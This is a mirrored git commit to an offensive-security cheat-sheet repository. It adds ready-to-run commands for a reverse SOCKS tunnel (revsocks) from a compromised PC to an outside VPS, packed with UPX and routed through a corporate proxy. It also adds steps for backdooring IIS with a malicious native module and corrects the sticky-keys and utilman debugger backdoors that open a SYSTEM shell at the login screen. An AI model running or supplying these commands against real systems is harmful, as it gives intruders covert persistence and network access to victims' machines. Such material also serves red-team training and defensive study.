mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-28 23:35:25 +00:00
IIS Raid Persistence
This commit is contained in:
parent
73aa26ba68
commit
7f0650dfc0
Methodology and Resources
@ -13,6 +13,7 @@
|
||||
* [sshuttle](#sshuttle)
|
||||
* [chisel](#chisel)
|
||||
* [Rpivot](#rpivot)
|
||||
* [RevSocks](#revsocks)
|
||||
* [plink](#plink)
|
||||
* [ngrok](#ngrok)
|
||||
* [Basic Pivoting Types](#basic-pivoting-types)
|
||||
@ -192,6 +193,38 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
||||
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
||||
```
|
||||
|
||||
## revsocks
|
||||
|
||||
```powershell
|
||||
# Listen on the server and create a SOCKS 5 proxy on port 1080
|
||||
user@VPS$ ./revsocks -listen :8443 -socks 127.0.0.1:1080 -pass Password1234
|
||||
|
||||
# Connect client to the server
|
||||
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234
|
||||
user@PC$ ./revsocks -connect 10.10.10.10:8443 -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10"
|
||||
```
|
||||
|
||||
|
||||
```powershell
|
||||
# Build for Linux
|
||||
git clone https://github.com/kost/revsocks
|
||||
export GOPATH=~/go
|
||||
go get github.com/hashicorp/yamux
|
||||
go get github.com/armon/go-socks5
|
||||
go get github.com/kost/go-ntlmssp
|
||||
go build
|
||||
go build -ldflags="-s -w" && upx --brute revsocks
|
||||
|
||||
# Build for Windows
|
||||
go get github.com/hashicorp/yamux
|
||||
go get github.com/armon/go-socks5
|
||||
go get github.com/kost/go-ntlmssp
|
||||
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w"
|
||||
go build -ldflags -H=windowsgui
|
||||
upx revsocks
|
||||
```
|
||||
|
||||
|
||||
## plink
|
||||
|
||||
```powershell
|
||||
|
@ -9,6 +9,9 @@
|
||||
* [Registry](#registry)
|
||||
* [Startup](#startup)
|
||||
* [Scheduled Task](#scheduled-task)
|
||||
* [Serviceland](#serviceland)
|
||||
* [IIS](#iis)
|
||||
* [Windows Service](#windows-service)
|
||||
* [Elevated](#elevated)
|
||||
* [HKLM](#hklm)
|
||||
* [Services](#services)
|
||||
@ -101,7 +104,19 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som
|
||||
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
||||
```
|
||||
|
||||
## Windows Service
|
||||
## Serviceland
|
||||
|
||||
### IIS
|
||||
|
||||
IIS Raid – Backdooring IIS Using Native Modules
|
||||
|
||||
```powershell
|
||||
$ git clone https://github.com/0x09AL/IIS-Raid
|
||||
$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS
|
||||
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true
|
||||
```
|
||||
|
||||
### Windows Service
|
||||
|
||||
Using SharPersist
|
||||
|
||||
@ -148,7 +163,7 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||
At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
|
||||
|
||||
```powershell
|
||||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
|
||||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||
```
|
||||
|
||||
#### sethc.exe
|
||||
@ -156,7 +171,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
|
||||
Hit F5 a bunch of times when you are at the RDP login screen.
|
||||
|
||||
```powershell
|
||||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f
|
||||
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
||||
```
|
||||
|
||||
|
||||
@ -165,3 +180,4 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
|
||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
||||
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
||||
* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
|
Loading…
Reference in New Issue
Block a user